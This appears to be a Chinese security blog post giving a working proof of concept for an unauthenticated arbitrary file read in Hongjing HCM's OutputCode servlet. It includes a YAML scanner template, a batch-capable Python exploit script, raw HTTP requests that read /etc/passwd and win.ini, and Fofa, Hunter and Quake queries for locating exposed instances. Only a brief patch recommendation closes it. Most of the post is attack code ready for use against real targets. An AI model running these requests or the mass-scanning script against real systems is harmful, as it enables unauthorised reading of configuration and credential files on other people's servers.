免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!

POC(Yaml&Python)

话不多说先上POC(Yam-poc由yakit或ProjectDiscovery Cloud Platform生成,Python-poc脚本由chatgpt生成,准确性请自测.

id: hongjing-hcm-OutputCode-file-read

info:
  name: OutputCode File Read in Hongjing HCM
  author: onewin
  severity: high
  description: Checks for an arbitrary file read vulnerability in Hongjing HCM.
  tags: hongjing,hcm,fileread


requests:
  - method: GET
    path:
      - "{{BaseURL}}/servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B"

    headers:
      User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "fonts"
        part: body

  - method: GET
    path:
      - "{{BaseURL}}/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP"

    headers:
      User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
      Content-Type: application/x-www-form-urlencoded
      Connection: close

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root"
        part: body

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning

# 打印颜色
RED = '\033[91m'
RESET = '\033[0m'
# 禁用不安全请求警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def check_vulnerability(url):
    try:
        # 构建攻击URL
        attack_url = url.rstrip('/') + "/servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B"
        attack_url2 = url.rstrip('/') + "/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP"
  
        # 向服务器发送请求
        response = requests.get(attack_url, verify=False, timeout=10)
        response2 = requests.get(attack_url2, verify=False, timeout=10)
  
        # 检查响应状态码和响应体中的关键字
        vulnerability_found = False
        if response.status_code == 200 and 'fonts' in response.text:
            vulnerability_found = True
        elif response2.status_code == 200 and 'root' in response2.text:
            vulnerability_found = True

        if vulnerability_found:
            print(f"{RED}URL [{url}] 宏景HCM OutputCode 任意文件读取漏洞。{RESET}")
        else:
            print(f"URL [{url}] 未发现漏洞。")
    except RequestException as e:
        print(f"URL [{url}] 请求失败: {e}")

def main():
    parser = argparse.ArgumentParser(description='检查目标URL是否存在宏景HCM OutputCode 任意文件读取漏洞。')
    parser.add_argument('-u', '--url', help='指定目标URL')
    parser.add_argument('-f', '--file', help='指定包含多个目标URL的文本文件')

    args = parser.parse_args()

    if args.url:
        # 如果URL未以http://或https://开头,则添加http://
        args.url = "http://" + args.url.strip("/") if not args.url.startswith(("http://", "https://")) else args.url
        check_vulnerability(args.url)
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            for url in urls:
                url = "http://" + url.strip("/") if not url.startswith(("http://", "https://")) else url
                check_vulnerability(url)

if __name__ == '__main__':
    main()

漏洞介绍

宏景HCM人力资源信息管理系统是一款全面覆盖人力资源管理各模块的软件,旨在帮助企事业单位构建高绩效组织,推动组织健康成长,提升组织软实力。

OutputCode接口存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。

资产测绘

  • 「Fofa」

app="HJSOFT-HCM"
  • 「Hunter」

app.name="宏景 HCM"
  • Quake

app: "宏景-HCM"

漏洞复现

在构造请求包数据之前:需要将读取文件进行加密转换,利用大佬开源的工具:

https://github.com/vaycore/HrmsTool
java -jar HrmsTool.jar -e c:/Windows/win.ini
java -jar HrmsTool.jar -e /etc/passwd

「1、构造数据包」

GET /servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
GET /servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

「2、查看返回包」


修复方案

官方已发布安全补丁,建议联系厂商打补丁或升级版本。

引入Web应用防火墙防护,配置接口拦截策略。